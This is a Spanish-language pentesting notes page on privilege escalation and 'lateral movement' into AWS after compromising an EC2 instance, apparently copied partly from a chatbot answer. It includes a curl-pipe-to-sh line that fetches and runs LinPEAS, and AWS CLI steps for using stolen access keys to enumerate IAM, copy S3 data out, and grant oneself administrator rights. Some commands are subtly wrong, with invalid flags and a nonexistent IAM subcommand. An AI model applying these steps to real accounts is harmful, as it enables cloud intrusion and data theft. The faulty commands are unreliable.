LinPEAS || Winpeas

PrivEsc id_rsa con permisos inadecuados

Una vez que se ha comprometido una máquina, el siguiente paso en un ataque de red o prueba de penetración es escalar privilegios para obtener más control sobre el sistema y, potencialmente, pivotar hacia otras máquinas dentro de la red. Aquí te dejo un enfoque bien estructurado para estos escenarios:

Herramientas Ăştiles:

  • LinPEAS: Automatiza la bĂşsqueda de vulnerabilidades de escalaciĂłn de privilegios.

    curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

Pivote: investigar

SĂ­, lo que se observa en la imagen (credenciales de EC2 Security Credentials) indica que podrĂ­as aprovechar estas claves para realizar movimientos laterales dentro del entorno de AWS (Amazon Web Services). Estas credenciales te proporcionan acceso potencial a recursos en la nube, dependiendo de los permisos asociados a las claves.

¿Por qué estas credenciales son importantes?

  1. AccessKeyId y SecretAccessKey:

    • Estas claves permiten autenticarse con la API de AWS.

    • Pueden ser usadas para interactuar con otros servicios de AWS, como S3, RDS, EC2, entre otros.

  2. Token temporal:

    • Es parte de un proceso de autenticaciĂłn temporal (STS - Security Token Service).

    • Se usa junto con las claves para ejecutar comandos o interactuar con la infraestructura AWS.

  3. Permisos asociados:

    • Las acciones que puedes realizar dependerán de las polĂ­ticas de IAM asociadas a estas credenciales.

    • Si los permisos son amplios (por ejemplo, AdministratorAccess), podrĂ­as realizar movimientos laterales, crear nuevos recursos o incluso comprometer toda la cuenta.


¿Qué significa un "movimiento lateral hacia la nube"?

Esto se refiere a usar las credenciales obtenidas en una máquina comprometida (en este caso, una instancia EC2) para interactuar con otros recursos o servicios dentro de la misma cuenta de AWS, o incluso en otras cuentas conectadas. Ejemplos de lo que podrías hacer:

  1. EnumeraciĂłn de recursos:

    • Enumerar usuarios y roles IAM:

      bashCopiar cĂłdigoaws iam list-users --access-key YOUR_ACCESS_KEY --secret-key YOUR_SECRET_KEY
      aws iam list-roles
    • Listar instancias EC2:

      bashCopiar cĂłdigoaws ec2 describe-instances
    • Listar buckets S3:

      bashCopiar cĂłdigoaws s3 ls
  2. ExfiltraciĂłn de datos:

    • Descargar contenido de un bucket S3.

      bashCopiar cĂłdigoaws s3 cp s3://bucket_name/file.txt .
  3. Crear nuevos recursos:

    • Lanzar nuevas instancias EC2 para propagar control.

    • Crear usuarios o roles con permisos elevados.

  4. EscalaciĂłn de privilegios:

    • Si las claves tienen permisos para modificar polĂ­ticas IAM, podrĂ­as asignarte permisos de administrador.

  5. Pivotar hacia otras cuentas:

    • Algunas configuraciones de IAM permiten acceso entre cuentas. Usando estas credenciales, podrĂ­as moverte hacia otros entornos en AWS.


Pasos recomendados tras obtener estas credenciales

  1. Probar las claves con AWS CLI: Configura un perfil con estas credenciales:

    bashCopiar cĂłdigoaws configure

    Prueba comandos básicos para verificar el nivel de acceso.

  2. Enumerar permisos IAM: Identifica qué acciones puedes realizar:

    bashCopiar cĂłdigoaws iam get-user
    aws iam list-policies-attached-to-user --user-name [user]
  3. Buscar otros recursos crĂ­ticos:

    • Almacenes de datos.

    • Máquinas virtuales relacionadas.

    • Sistemas de logging (CloudTrail).

Last updated